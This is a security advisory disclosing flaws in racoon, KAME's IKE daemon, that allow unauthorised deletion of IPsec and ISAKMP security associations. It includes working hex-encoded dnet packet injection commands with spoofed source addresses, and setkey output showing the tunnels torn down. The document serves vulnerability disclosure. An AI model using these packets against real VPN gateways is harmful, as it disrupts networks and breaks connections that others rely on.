0 Preface Now that most bugs in isakmpd that allowed for unauthorized SA deletion are "fixed", it's time to release some information on racoon. By the way: About 5 months ago I tried to contact the KAME developers. 1 Description racoon, KAME's IKE daemon, contains some flaws, that allow for unauthorized deletion of IPsec (and ISAKMP) SAs. 2 Description 2.1 racoon's "authentication" of delete messages When racoon receives a delete message containing the initiator cookie of a main/aggressive/base mode, that has not yet setup a ISAKMP SA, it fulfills the request, if the message also includes a (dummy) hash payload and originates from the right IP address. See isakmp_main() in isakmp.c and purge_isakmp_spi(), purge_ipsec_spi(), isakmp_info_recv() and isakmp_info_recv_d() in isakmp_inf.c for details and amusement. 2.2 INITIAL-CONTACT with racoon It is nearly the same with INITIAL-CONTACT notifications, but there is no need of a (dummy) hash payload and it's way more effective, because it deletes all IPsec SAs "relatived to the destination address". See isakmp_info_recv_n() and info_recv_initialcontact() in isakmp_inf.c for additional information. 3 Affected Systems All versions of racoon are affected. 4 Leveraging the Issues .. Take a look at http://securityfocus.com/archive/1/348637 for the assumed scenario. 4.1 .. using delete messages An IPsec tunnel between vpn-gw-a and vpn-gw-a is established: vpn-gw-a# setkey -D esp mode=tunnel spi=4127562105(0xf6059979) reqid=0(0x00000000) [..] esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000) [..] The attacker launches step 1 of his attack. He pretends to initiate a phase 1 exchange (with spoofed source IP address, of course): attacker# dnet hex \ > "\x17\x17\x17\x17" \ > "\x17\x17\x17\x17" \ > "\x00\x00\x00\x00" \ > "\x00\x00\x00\x00" \ > "\x01\x10\x02\x00" \ > "\x00\x00\x00\x00" \ > "\x00\x00\x00\x48" \ > "\x00\x00\x00\x2c" \ > "\x00\x00\x00\x01" \ > "\x00\x00\x00\x01" \ > "\x00\x00\x00\x20" \ > "\x01\x01\x00\x01" \ > "\x00\x00\x00\x18" \ > "\x00\x01\x00\x00" \ > "\x80\x01\x00\x05" \ > "\x80\x02\x00\x02" \ > "\x80\x03\x00\x01" \ > "\x80\x04\x00\x02" | pipe> dnet udp sport 500 dport 500 | pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a | pipe pipe pipe> dnet send If racoon finds the included proposal acceptable it creates a state. Now the attacker carries out step 2: attacker# dnet hex \ > "\x17\x17\x17\x17" \ > "\x17\x17\x17\x17" \ > "\x00\x00\x00\x00" \ > "\x00\x00\x00\x00" \ > "\x08\x10\x05\x00" \ > "\x00\x00\x00\x00" \ > "\x00\x00\x00\x30" \ > "\x0c\x00\x00\x04" \ > "\x00\x00\x00\x10" \ > "\x00\x00\x00\x01" \ > "\x03\x04\x00\x01" \ > "\xf6\x05\x99\x79" | pipe> dnet udp sport 500 dport 500 | pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a | pipe pipe pipe> dnet send It seems that racoon knows the attacker ;-): vpn-gw-a# setkey -D esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000) [..] Note: You can also delete ISAKMP SAs. 4.2 .. using INITIAL-CONTACT The IPsec tunnel is up an running: vpn-gw-a# setkey -D esp mode=tunnel spi=785352974(0x2ecf890e) reqid=0(0x00000000) [..] esp mode=tunnel spi=183367627(0x0aedf7cb) reqid=0(0x00000000) [..] Again the attacker does step 1 and injects an ISAKMP message like this: attacker# dnet hex \ > "\x17\x17\x17\x17" \ > "\x17\x17\x17\x17" \ > "\x00\x00\x00\x00" \ > "\x00\x00\x00\x00" \ > "\x0b\x10\x05\x00" \ > "\x00\x00\x00\x00" \ > "\x00\x00\x00\x28" \ > "\x00\x00\x00\x0c" \ > "\x00\x00\x00\x01" \ > "\x01\x00\x60\x02" | pipe> dnet udp sport 500 dport 500 | pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a | pipe pipe pipe> dnet send racoon blindly obeys the attacker's command: vpn-gw-a# setkey -D No SAD entries. 5. Bug fixes There are no bug fixes. Thomas Walpuski